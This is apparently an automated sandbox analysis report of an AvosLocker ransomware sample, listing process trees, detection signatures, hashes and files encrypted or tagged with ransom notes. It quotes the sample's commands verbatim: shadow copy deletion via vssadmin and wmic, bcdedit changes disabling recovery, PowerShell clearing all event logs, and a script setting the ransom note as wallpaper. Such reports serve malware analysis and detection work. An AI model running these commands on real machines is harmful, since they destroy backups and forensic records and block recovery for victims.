PID 1232 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1232 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 2076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1236 wrote to memory of 2076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1236 wrote to memory of 2076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1284 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1284 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1284 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 908 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 908 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 908 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1660 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 912 wrote to memory of 2420 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 912 wrote to memory of 2420 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 912 wrote to memory of 2420 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1232 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3060 wrote to memory of 3948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3060 wrote to memory of 3948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3060 wrote to memory of 3948 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3060 wrote to memory of 2528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 3060 wrote to memory of 2528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 3060 wrote to memory of 2528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe

"C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1700332598.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

\Device\HarddiskVolume1\Boot\GET_YOUR_FILES_BACK.txt

MD5 064348106157ac3e6972ebe6852f665f
SHA1 4f95549af4873637f05f5f574b93605d30a28dbb
SHA256 876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a
SHA512 e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

memory/2992-1007-0x000000001B280000-0x000000001B562000-memory.dmp

memory/2992-1080-0x0000000002310000-0x0000000002318000-memory.dmp

memory/2992-1297-0x0000000002350000-0x00000000023D0000-memory.dmp

memory/2992-1327-0x0000000002350000-0x00000000023D0000-memory.dmp

memory/2992-1334-0x0000000002350000-0x00000000023D0000-memory.dmp

memory/2992-1504-0x0000000002350000-0x00000000023D0000-memory.dmp

C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt

MD5 064348106157ac3e6972ebe6852f665f
SHA1 4f95549af4873637f05f5f574b93605d30a28dbb
SHA256 876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a
SHA512 e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 37db35bb35a49d029a8e75c8c65b44f8
SHA1 0db3e4eebe23f270e865258ec50ec3f2c4fce270
SHA256 25fb9885b75d90e62e19bf05c0cbb69b533820196aacc09efa0a773ac16ed59c
SHA512 313eb372d02f4921432a519bca11c622fb561cfd2972eb4738e300ef556f1d61e394f890c3b7880e597ae32749792cd44f0681e6e07b253166ccdf478e891129

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EN5SGQ61K109RTDDN5BS.temp

MD5 37db35bb35a49d029a8e75c8c65b44f8
SHA1 0db3e4eebe23f270e865258ec50ec3f2c4fce270
SHA256 25fb9885b75d90e62e19bf05c0cbb69b533820196aacc09efa0a773ac16ed59c
SHA512 313eb372d02f4921432a519bca11c622fb561cfd2972eb4738e300ef556f1d61e394f890c3b7880e597ae32749792cd44f0681e6e07b253166ccdf478e891129

memory/3060-24550-0x000000001B0D0000-0x000000001B3B2000-memory.dmp

memory/3060-24551-0x0000000002460000-0x0000000002468000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 064348106157ac3e6972ebe6852f665f
SHA1 4f95549af4873637f05f5f574b93605d30a28dbb
SHA256 876a6444eeb977c6d73be9474d3cc85307a0f68d4b342c2e59913172f80caa2a
SHA512 e121d453c52fa8aabc7a878649bc68dc25a2bd24861c3557c82d8182ea7ac2b9f9921b5caae950901d036dd77a437e65233cbe5add23dc8d2c7446431bb3ab33

memory/3060-24553-0x0000000002870000-0x00000000028F0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-11 15:49

Reported

2023-05-11 15:52

Platform

win10v2004-20230220-en

Max time kernel

81s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\DisableUpdate.tiff => C:\Users\Admin\Pictures\DisableUpdate.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\DismountConvert.tif => C:\Users\Admin\Pictures\DismountConvert.tif.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Users\Admin\Pictures\GrantRestart.tiff C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\GrantRestart.tiff => C:\Users\Admin\Pictures\GrantRestart.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\RegisterAssert.tif => C:\Users\Admin\Pictures\RegisterAssert.tif.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File renamed C:\Users\Admin\Pictures\SetInitialize.tif => C:\Users\Admin\Pictures\SetInitialize.tif.avos2 C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Users\Admin\Pictures\DisableUpdate.tiff C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1347122807.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbytools.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Retail-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\STRTEDGE.INF C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-250.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\uk-ua\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\nub.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\jre\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\Logo.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTest-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Java\jre1.8.0_66\lib\management\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-24_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\ExcelCapabilities.json C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\PUSH.WAV C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_Mocking.help.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_auditreport_18.svg C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\casual.dotx C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailMediumTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vreg\dcfmui.msi.16.en-us.vreg.dat C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXT C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\ui-strings.js C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg1a.jpg C:\Users\Admin\AppData\Local\Temp\5d6e4bd7bd7239fab20e043fb292974497297af89759b1b0d48d7d006e5e96fa.exe N/A
